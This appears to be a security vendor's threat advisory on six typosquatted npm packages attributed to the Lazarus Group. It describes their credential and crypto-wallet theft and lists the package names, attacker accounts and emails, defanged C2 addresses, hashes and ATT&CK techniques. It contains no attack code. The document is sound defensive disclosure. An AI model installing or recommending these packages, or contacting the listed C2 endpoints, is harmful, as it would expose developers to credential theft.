Lazarus npm Supply Chain Attack

The Lazarus Group uploaded six malicious npm packages intended to infiltrate developer environments, initiating a targeted supply chain attack. These programs, which have been downloaded approximately 330 times, are designed to install backdoors for long-term access, steal cryptocurrency wallets, and steal credentials. Using the typo squatting technique, this attack creates package names that closely resemble legitimate npm packages to trick developers into inadvertently downloading them.

Identified Malicious Packages

The Lazarus Group campaign involves the following six packages:
● is-buffer-validator – Mimics the original is-buffer package to steal credentials.
● yoojae-validator – Fake validation library used to extract sensitive data from the system.
● event-handle-package – Masquerades as an event-handling tool but installs a backdoor for remote access.
● array-empty-validator – Fake package designed to collect system and browser credentials.
● react-event-dependency – Claims to be a React utility, runs malware to compromise the developer environment.
● auth-validator – Mimics an authentication tool to steal login credentials and API keys.

Techniques and Payloads Used

Once installed, the packages execute malicious code that performs several harmful activities:
● System reconnaissance, including gathering information such as hostname, OS, and directory structure.
● Browser credentials theft, targeting login data stored in Chrome, Brave, and Firefox.
● Cryptocurrency wallet targeting, specifically searching for Solana’s id.json and Exodus’ exodus.wallet files to steal crypto assets.
● Deployment of BeaverTail malware and InvisibleFerret backdoor, which provide Lazarus with remote access and persistence within the compromised system.

Code snippet that downloads malware payloads

According to the Socket Research Team, some of these malicious packages were also supported by fake GitHub repositories, making them appear more legitimate to developers and increasing the likelihood of successful compromise.

Impact and Threat Scope

In addition to endangering individual engineers, this campaign also puts companies at risk if they decide to incorporate these stolen packages into larger software projects. Lazarus might gain access to developer credentials, SSH keys, and cloud tokens after the packages are installed in a development pipeline. This would allow for lateral movement across large enterprises and increase the scope of the penetration.

Additionally, in line with their previous attacks against cryptocurrency exchanges and financial systems, the campaign demonstrates Lazarus Group’s ongoing focus on bitcoin theft as a way to finance state-backed cybercrime operations. The aggressive nature of the campaign suggests a persistent and ongoing threat, underscoring the necessity of monitoring in software supply chain security, even though the six detected packages have been deleted from npm and GitHub.

Malicious npm Packages

● is-buffer-validator
● yoojae-validator
● event-handle-package
● array-empty-validator
● react-event-dependency
● auth-validator

Threat Actor Identifiers

npm Aliases and Email Addresses:
● edan0831 — edanjohn1991@gmail.com
● hottblaze — hottblaze012@gmail.com
● ricardoalexis07 — ricardoalexis0629@gmail.com
● alextucker0519 — alextucker@softworldnet.com
● elondavid — elondavid888@gmail.com
● kevin_tr — robustplutus@gmail.com

GitHub Accounts:
● edan0831
● alximmykola379
● alextucker0519
● elondavid888
● kevin-tra

Malicious GitHub Repositories

● github.com/edan0831/is-buffer-validator
● github.com/alximmykola379/yoojae-validator
● github.com/alextucker0519/array-empty-validator
● github.com/elondavid888/react-event-dependency
● github.com/kevin-tra/auth-validator (defunct)

Command and Control (C2) Endpoints

Primary C2 Server:
● 172.86.84[.]38

Associated Endpoints:
● hxxp://172.86.84[.]38:1224/uploads
● hxxp://172.86.84[.]38:1224/pdown
● hxxp://172.86.84[.]38:1224/client/9/902

Hash:
● 38d365898fd6acbb4788e654e864922d (MD5)
● 281c2f8060dd3f0b244ae2282c3d3d406f8dd458 (SHA1)
● 6a104f07ab6c5711b6bc8bf6ff956ab8cd597a388002a966e980c5ec9678b5b0 (SHA256)

MITRE ATT&CK Techniques

● T1195.002 — Supply Chain Compromise: Compromise Software Supply Chain
● T1608.001 — Stage Capabilities: Upload Malware
● T1204.002 — User Execution: Malicious File
● T1059.007 — Command and Scripting Interpreter: JavaScript
● T1027.013 — Obfuscated Files or Information: Encrypted/Encoded File
● T1546.016 — Event Triggered Execution: Installer Packages
● T1005 — Data from Local System
● T1082 — System Information Discovery
● T1083 — File and Directory Discovery
● T1217 — Browser Information Discovery
● T1555.003 — Credentials from Password Stores: Credentials from Web Browsers
● T1555.001 — Credentials from Password Stores: Keychain
● T1041 — Exfiltration Over C2 Channel
● T1105 — Ingress Tool Transfer
● T1119 — Automated Collection
● T1657 — Financial Theft

Verify npm Packages

Check publisher reputation and download metrics; scrutinize open-source code for obfuscation and unexpected external calls.

Enhance Security Measures

Implement multi-layered protections such as sandboxing, robust endpoint protection, and blocking suspicious outbound connections.

Automation and Monitoring

Integrate automated dependency auditing into CI/CD pipelines, continuously monitor changes, and set up alerts for unexpected updates.

Education and Enforcement

Train teams to recognize typosquatting tactics and enforce strict supply chain security policies across all development practices.

HackRead. (2024, April 10). Lazarus Group backdoor found in fake NPM packages – A major supply chain attack. HackRead. https://hackread.com/lazarus-group-backdoor-fake-npm-packages-attack/

Cimpanu, C. (2024, April 9). North Korean Lazarus hackers infect hundreds via npm packages. BleepingComputer. https://www.bleepingcomputer.com/news/security/north-korean-lazarus-hackers-infect-hundreds-via-npm-packages/

Socket. (2024, April 10). Lazarus strikes npm again with a new wave of malicious packages. Socket Blog. https://socket.dev/blog/lazarus-strikes-npm-again-with-a-new-wave-of-malicious-packages

Sleep well, we got you covered.